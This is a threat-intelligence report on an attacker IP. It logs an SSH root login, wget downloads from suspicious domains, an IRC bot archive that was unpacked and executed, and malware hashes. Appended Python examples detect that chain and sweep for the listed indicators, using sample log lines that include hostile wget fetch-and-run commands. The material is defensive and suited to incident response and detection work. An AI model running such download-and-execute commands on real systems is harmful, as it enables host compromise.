IP Address: 109.166.131.147 - Previously Malicious


This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SSH

Tags

HTTP, DNS Query, Networking Operation, Human, Download and Allow Execution, Superuser Operation, Download File, Download Operation, Access Suspicious Domain, Bulk Files Tampering, Malicious File, 26 Shell Commands, Download and Execute, Package Install, SSH, Successful SSH Login, Outgoing Connection, Read Password Secrets

Connect Back Servers

Domains: netrix-emea.net, _http._tcp.archive.ubuntu.com, www.speedtest.net, canonical.com, stosat-rstn-01.sys.comcast.net, shentel.net, sp1.winchesterwireless.net, stosat-malt-01.sys.comcast.net, www.saminicu.ml, edinburg.speedtest.shentel.net, bigdaddy.wave2net.com, blazingfast.io, archive.ubuntu.com, transfer.sh, saminicunr1.000webhostapp.com, comcast.net, nasapaul.com

IP addresses: 69.241.0.94, 185.216.24.82, 145.14.145.143, 204.111.5.18, 151.101.2.219, 145.14.145.134, 69.241.87.90, 178.62.44.163, 91.189.88.149, 145.14.145.43, 184.170.114.134, 204.111.21.7, 145.14.144.155, 145.14.145.149, 185.61.137.36

Basic Information

IP Address

109.166.131.147

Domain

-

ISP

Orange Romania

Country

Romania

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-07-22

Last seen in Guardicore Centra

2018-07-23

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

A user logged in using SSH with the following credentials: root / **** - Authentication policy: White List

Successful SSH Login

A possibly malicious Superuser Operation was detected

Download Operation Package Install Superuser Operation Networking Operation

A possibly malicious Download Operation was detected 2 times

Download Operation Package Install Superuser Operation Networking Operation

Process /usr/bin/wget attempted to access suspicious domains: www.saminicu.ml

DNS Query Access Suspicious Domain Outgoing Connection

Process /usr/bin/wget generated outgoing network traffic to: 145.14.145.143:80

Outgoing Connection

/var/tmp/ntest.py was downloaded

Download File

Process /usr/bin/python2.7 attempted to access domains: stosat-rstn-01.sys.comcast.net, www.speedtest.net, stosat-malt-01.sys.comcast.net and edinburg.speedtest.shentel.net

DNS Query

Process /usr/bin/python2.7 generated outgoing network traffic to: 151.101.2.219:80, 69.241.87.90:80, 204.111.21.7:80, 184.170.114.134:80, shentel.net:80 and comcast.net:80

Outgoing Connection

Process /usr/bin/python2.7 attempted to access suspicious domains: sp1.winchesterwireless.net and bigdaddy.wave2net.com

DNS Query Access Suspicious Domain Outgoing Connection

A possibly malicious Package Install was detected 3 times

Download Operation Package Install Superuser Operation Networking Operation

Process /usr/bin/wget attempted to access suspicious domains: nasapaul.com

DNS Query Access Suspicious Domain Outgoing Connection

Process /usr/bin/wget generated outgoing network traffic to: 185.61.137.36:80

Outgoing Connection

/var/tmp/IRC.zip was downloaded

Download File

The file /var/tmp/IRC/Changes was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Changes.old was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Changes.older was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Config was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Donation was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/INSTALL.REMOTEINC was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/LICENSE was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Makefile.in was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/README was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/Unreal.nfo was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/autogen.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.channel.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.message.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/badwords.quit.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/config.guess was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/config.sub was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/configure was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/configure.ac was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/createchangelog was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/curl-ca-bundle.crt was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/curlinstall was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/dccallow.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/help.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/m_template.c was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/makefile.win32 was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/modulize was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/newnet was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/spamfilter.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/unreal.in was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/unrealircd.conf was downloaded and granted execution privileges

Download and Allow Execution

The file /var/tmp/IRC/update was downloaded and granted execution privileges

Download and Allow Execution

Process /usr/lib/apt/methods/http attempted to access domains: _http._tcp.archive.ubuntu.com and archive.ubuntu.com

DNS Query

Process /usr/lib/apt/methods/http generated outgoing network traffic to: 91.189.88.149:80

Outgoing Connection

The file /usr/share/doc/nano was downloaded and granted execution privileges

Download and Allow Execution

The file /usr/share/doc/nano/examples was downloaded and granted execution privileges

Download and Allow Execution

The file /usr/share/nano was downloaded and granted execution privileges

Download and Allow Execution

The file /bin/nano was downloaded and executed 2 times

Download and Execute

A possibly malicious Networking Operation was detected

Download Operation Package Install Superuser Operation Networking Operation

The file /var/tmp/IRC/a.out was downloaded and granted execution privileges

Download and Allow Execution

/tmp/cczUwXYz.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/a.out was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /var/tmp/IRC/conftest was downloaded and granted execution privileges 2 times

Download and Allow Execution

/tmp/cc02QyAA.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/conftest was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/tmp/ccK1yhjM.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

/var/tmp/IRC/conftest.o was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

Connection was closed due to timeout

Process /usr/bin/unzip performed bulk changes in {/var} on 352 files

Bulk Files Tampering

Process /usr/bin/dpkg performed bulk changes in {/} on 141 files

Bulk Files Tampering
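The chain recorded above (a root login over SSH, wget fetching into /var/tmp, the download then run by an interpreter or unpacked and executed) can be detected without any of the specific indicators on this page. The following Python is an added example, not Guardicore's code and not part of the report: it correlates sshd "Accepted" lines with process-execution records keyed by the sshd session pid, and alerts when a session downloads into a world-writable staging directory and afterwards runs or unpacks what it fetched. The audit record format, pids and full command lines are constructed for the example; only the domain and file names are taken from the attack flow.

```python
"""Correlate a root SSH login with a follow-on download-and-execute chain.

Added example, not code from the Guardicore report. The log format below is a
constructed mix of sshd auth.log lines and simplified process-audit records
keyed by the sshd session pid (the 'sid' field); a real deployment would map
auditd or eBPF exec events onto sessions the same way.
"""
import re
from dataclasses import dataclass, field

STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # world-writable drop locations
DOWNLOADERS = {"wget", "curl"}

LOGIN_RE = re.compile(
    r"sshd\[(?P<sid>\d+)\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
EXEC_RE = re.compile(r"^exec uid=(?P<uid>\d+) sid=(?P<sid>\d+) cmd=(?P<cmd>.+)$")

# Constructed sample input: file and domain names come from the report, the
# command lines, pids and the second (benign) session are invented.
SAMPLE_EVENTS = """\
sshd[1183]: Accepted password for root from 109.166.131.147 port 51342 ssh2
exec uid=0 sid=1183 cmd=/usr/bin/wget http://www.saminicu.ml/ntest.py -O /var/tmp/ntest.py
exec uid=0 sid=1183 cmd=/usr/bin/python2.7 /var/tmp/ntest.py
exec uid=0 sid=1183 cmd=/usr/bin/wget http://nasapaul.com/IRC.zip -O /var/tmp/IRC.zip
exec uid=0 sid=1183 cmd=/usr/bin/unzip /var/tmp/IRC.zip -d /var/tmp
exec uid=0 sid=1183 cmd=/var/tmp/IRC/a.out
sshd[2201]: Accepted publickey for dev from 10.20.0.5 port 40112 ssh2
exec uid=1000 sid=2201 cmd=/usr/bin/wget http://archive.ubuntu.com/pkg.deb -O /home/dev/pkg.deb
"""


@dataclass
class Session:
    user: str
    ip: str
    downloads: list = field(default_factory=list)  # staged paths written by wget/curl
    executed: list = field(default_factory=list)   # staged paths later run or unpacked


def _staged(tokens):
    """Arguments that point into a staging directory."""
    return [t for t in tokens if t.startswith(STAGING_DIRS)]


def correlate(log_text):
    """Return one alert per SSH session that downloads into a staging
    directory and then runs or unpacks what it downloaded."""
    sessions = {}
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            sessions[m["sid"]] = Session(m["user"], m["ip"])
            continue
        m = EXEC_RE.match(line)
        if not m or m["sid"] not in sessions:
            continue                      # no login seen for this session; ignore
        s = sessions[m["sid"]]
        tokens = m["cmd"].split()
        binary = tokens[0].rsplit("/", 1)[-1]
        staged = _staged(tokens)
        if binary in DOWNLOADERS and staged:
            s.downloads.extend(staged)    # downloader writing into /tmp, /var/tmp, ...
        elif tokens[0].startswith(STAGING_DIRS):
            s.executed.append(tokens[0])  # direct execution of a staged binary
        else:
            # interpreter, unzip, tar, ... operating on something this session fetched
            s.executed.extend(p for p in staged if p in s.downloads)
    alerts = []
    for sid, s in sessions.items():
        if s.downloads and s.executed:
            alerts.append({"sid": sid, "user": s.user, "ip": s.ip,
                           "downloads": s.downloads, "executed": s.executed,
                           "severity": "high" if s.user == "root" else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Run as a script it prints a single high-severity alert for the root session from 109.166.131.147; the key-based developer session that downloads into its home directory produces nothing. The third branch deliberately counts unzip of a fetched archive as consuming the download: the long run of "granted execution privileges" events for LICENSE, README and the rest of /var/tmp/IRC/ in the flow above follows the IRC.zip download and the 352-file bulk change by /usr/bin/unzip, which restores the mode bits stored in the archive.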

Associated Files

/var/tmp/IRC/conftest (the same path is listed twice with different hashes: conftest is the scratch binary that the configure script rebuilds for each check, so each build hashes differently)

SHA256: c3a79017107d26dab919768b08cd13cc1a74d9163d1809b1ac242f4089ed6914

8560 bytes

/var/tmp/ntest.py

SHA256: f0348ce829a1593d34d9db1f73cd0907128e8f39e697bdaf043079f0f5bbc994

24827 bytes

/var/tmp/IRC/conftest

SHA256: 25788521e0690039f7b77d584474ab4ef4a9234e225d1140465e3ade90de7e94

9616 bytes

/root/boty.php

SHA256: 7014492aafecd662abfa85668bbdb7402a52d40e849d04a28263037e830d6ed2

8712 bytes

/root/boty.txt

SHA256: 2cb7452a5d13797a8013092f4910a15d339adbd8d810fdedf6e2b9bbc83cb390

38097 bytes
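To sweep other hosts for the indicators on this page, the following Python is an added example, not part of the report and not Guardicore's tooling. It hashes files under a directory and compares them with the SHA256 values listed under Associated Files, and scans DNS query log lines for the connect-back domains. The tiering is the editor's reading of the attack flow, not a field in the report: the domains the flow itself marks as suspicious are hunting-grade, while archive.ubuntu.com, canonical.com and the speedtest, comcast and shentel hosts were reached by apt and by the downloaded Python script and will match on almost any Ubuntu host, so they are reported as shared infrastructure rather than as alerts. The dnsmasq-style log lines and the file written by the demo are constructed.

```python
"""Sweep a directory and a DNS query log for the indicators in this report.

Added example, not code from the report. Hash values and domains are copied
from the Associated Files and Connect Back Servers sections; the high/shared
tiering is an editorial reading of the attack flow. Log lines are constructed.
"""
import hashlib
import os
import re
import tempfile

# SHA256 -> path reported, from "Associated Files"
FILE_HASHES = {
    "c3a79017107d26dab919768b08cd13cc1a74d9163d1809b1ac242f4089ed6914": "/var/tmp/IRC/conftest",
    "f0348ce829a1593d34d9db1f73cd0907128e8f39e697bdaf043079f0f5bbc994": "/var/tmp/ntest.py",
    "25788521e0690039f7b77d584474ab4ef4a9234e225d1140465e3ade90de7e94": "/var/tmp/IRC/conftest",
    "7014492aafecd662abfa85668bbdb7402a52d40e849d04a28263037e830d6ed2": "/root/boty.php",
    "2cb7452a5d13797a8013092f4910a15d339adbd8d810fdedf6e2b9bbc83cb390": "/root/boty.txt",
}

# Domains the attack flow itself labels "suspicious": hunt on these.
HIGH_CONFIDENCE_DOMAINS = {"www.saminicu.ml", "nasapaul.com",
                           "sp1.winchesterwireless.net", "bigdaddy.wave2net.com"}
# Reached by apt and by the downloaded speed-test script; matches are context, not alerts.
SHARED_INFRA = {"archive.ubuntu.com", "canonical.com", "speedtest.net",
                "comcast.net", "shentel.net"}

QUERY_RE = re.compile(r"query\[\w+\] (?P<name>\S+) from (?P<client>\S+)")

# Constructed dnsmasq-style query log (clients and timestamps invented).
SAMPLE_DNS_LOG = """\
Jul 22 14:02:11 gw dnsmasq[812]: query[A] www.saminicu.ml from 10.0.0.7
Jul 22 14:02:15 gw dnsmasq[812]: query[A] edinburg.speedtest.shentel.net from 10.0.0.7
Jul 22 14:03:40 gw dnsmasq[812]: query[A] archive.ubuntu.com from 10.0.0.7
Jul 22 14:03:41 gw dnsmasq[812]: query[A] nasapaul.com from 10.0.0.7
Jul 22 14:04:00 gw dnsmasq[812]: query[A] intranet.example.net from 10.0.0.9
"""


def domain_tier(name):
    """'high', 'shared-infra' or None; matches exact names and subdomains."""
    name = name.lower().rstrip(".")
    for tier, domains in (("high", HIGH_CONFIDENCE_DOMAINS), ("shared-infra", SHARED_INFRA)):
        if any(name == d or name.endswith("." + d) for d in domains):
            return tier
    return None


def classify_queries(log_text):
    """Return (client, queried name, tier) for every query that hits an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        tier = domain_tier(m["name"])
        if tier:
            hits.append((m["client"], m["name"], tier))
    return hits


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_hashes(root, hashes=FILE_HASHES):
    """Walk root and return (path, digest, reported path) for every hash match."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue                  # unreadable or vanished file; keep sweeping
            if digest in hashes:
                hits.append((path, digest, hashes[digest]))
    return hits


def demo_hash_sweep():
    """Write a constructed stand-in file to a throwaway directory and show that
    only a digest added to the indicator set produces a hit."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "ntest.py")
        with open(path, "wb") as f:
            f.write(b"# constructed stand-in, not the real ntest.py\n")
        report_hits = sweep_hashes(root)                    # real report hashes: no match
        extended = dict(FILE_HASHES, **{sha256_file(path): "constructed sample"})
        return len(report_hits), [label for _, _, label in sweep_hashes(root, extended)]


if __name__ == "__main__":
    for hit in classify_queries(SAMPLE_DNS_LOG):
        print(hit)
    print(demo_hash_sweep())
```

Matching on the /var/tmp/IRC/conftest hashes is of limited value on its own: conftest is rebuilt by every configure run, so those two digests identify this particular build rather than the archive that produced it. The ntest.py and /root/boty.* hashes, and the high-tier domains, are the indicators worth pivoting on.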
